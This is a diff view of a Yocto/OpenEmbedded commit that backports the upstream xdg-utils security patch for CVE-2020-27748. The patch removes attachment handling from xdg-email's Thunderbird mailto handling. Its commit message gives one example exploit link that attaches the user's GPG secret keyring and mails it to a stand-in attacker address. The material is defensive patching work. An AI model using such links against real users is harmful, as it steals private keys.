diff options
Diffstat (limited to 'meta')
-rw-r--r-- | meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch | 58 | ||||
-rw-r--r-- | meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb | 1 |
2 files changed, 59 insertions, 0 deletions
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 0000000000..948b9e22e9 --- /dev/null +++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch | |||
@@ -0,0 +1,58 @@ | |||
1 | From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 | ||
2 | From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> | ||
3 | Date: Tue, 18 Aug 2020 16:52:24 +0100 | ||
4 | Subject: [PATCH] xdg-email: remove attachment handling from mailto | ||
5 | MIME-Version: 1.0 | ||
6 | Content-Type: text/plain; charset=UTF-8 | ||
7 | Content-Transfer-Encoding: 8bit | ||
8 | |||
9 | This allows attacker to extract secrets from users: | ||
10 | |||
11 | mailto:sid@evil.com?attach=/.gnupg/secring.gpg | ||
12 | |||
13 | See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 | ||
14 | and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 | ||
15 | |||
16 | Signed-off-by: Jörg Thalheim <joerg@thalheim.io> | ||
17 | --- | ||
18 | scripts/xdg-email.in | 7 +------ | ||
19 | 1 file changed, 1 insertion(+), 6 deletions(-) | ||
20 | |||
21 | Upstream-Status: Backport | ||
22 | CVE: CVE-2020-27748 | ||
23 | |||
24 | diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in | ||
25 | index 6db58ad..5d2f4f3 100644 | ||
26 | --- a/scripts/xdg-email.in | ||
27 | +++ b/scripts/xdg-email.in | ||
28 | @@ -32,7 +32,7 @@ _USAGE | ||
29 | |||
30 | run_thunderbird() | ||
31 | { | ||
32 | - local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH | ||
33 | + local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY | ||
34 | THUNDERBIRD="$1" | ||
35 | MAILTO=$(echo "$2" | sed 's/^mailto://') | ||
36 | echo "$MAILTO" | grep -qs "^?" | ||
37 | @@ -48,7 +48,6 @@ run_thunderbird() | ||
38 | BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) | ||
39 | SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) | ||
40 | BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) | ||
41 | - ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) | ||
42 | |||
43 | if [ -z "$TO" ] ; then | ||
44 | NEWMAILTO= | ||
45 | @@ -68,10 +67,6 @@ run_thunderbird() | ||
46 | NEWMAILTO="${NEWMAILTO},$BODY" | ||
47 | fi | ||
48 | |||
49 | - if [ -n "$ATTACH" ] ; then | ||
50 | - NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" | ||
51 | - fi | ||
52 | - | ||
53 | NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') | ||
54 | DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" | ||
55 | "$THUNDERBIRD" -compose "$NEWMAILTO" | ||
56 | -- | ||
57 | GitLab | ||
58 | |||
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index d371c5c28c..41b74b8598 100644 --- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb | |||
@@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014" | |||
20 | SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ | 20 | SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ |
21 | file://0001-Reinstate-xdg-terminal.patch \ | 21 | file://0001-Reinstate-xdg-terminal.patch \ |
22 | file://0001-Don-t-build-the-in-script-manual.patch \ | 22 | file://0001-Don-t-build-the-in-script-manual.patch \ |
23 | file://1f199813e0eb0246f63b54e9e154970e609575af.patch \ | ||
23 | " | 24 | " |
24 | 25 | ||
25 | SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" | 26 | SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" |